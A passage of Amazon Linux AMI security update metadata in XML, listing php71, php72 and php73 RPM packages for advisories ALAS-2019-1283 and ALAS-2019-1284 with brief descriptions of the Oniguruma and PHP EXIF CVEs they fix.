arch="i686"><filename>Packages/php73-fpm-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.4-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1283</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1283: low priority package update for php71 php73</title><issued date="2019-09-13 22:53:00" /><updated date="2019-09-18 21:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13224:
A use-after-free in onig_new_deluxe() in regext.c in Oniguruma 6.9.2 allows attackers to potentially cause information disclosure, denial of service, or possibly code execution by providing a crafted regular expression. The attacker provides a pair of a regex pattern and a string, with a multi-byte encoding that gets handled by onig_new_deluxe(). Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust.
1728970:
CVE-2019-13224 oniguruma: use-after-free in onig_new_deluxe() in regext.c
CVE-2019-11042:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
1739465:
CVE-2019-11042 php: heap buffer over-read in exif_process_user_comment()
CVE-2019-11041:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
1739459:
CVE-2019-11041 php: heap buffer over-read in exif_scan_thumbnail()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11041" title="" id="CVE-2019-11041" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11042" title="" id="CVE-2019-11042" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13224" title="" id="CVE-2019-13224" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-embedded" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.8-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1284</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1284: low priority package update for php72</title><issued date="2019-09-13 22:55:00" /><updated date="2019-09-18 21:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11042:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
1739465:
CVE-2019-11042 php: heap buffer over-read in exif_process_user_comment()
CVE-2019-11041:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
1739459:
CVE-2019-11041 php: heap buffer over-read in exif_scan_thumbnail()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11041" title="" id="CVE-2019-11041" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11042" title="" id="CVE-2019-11042" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-tidy" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.21" 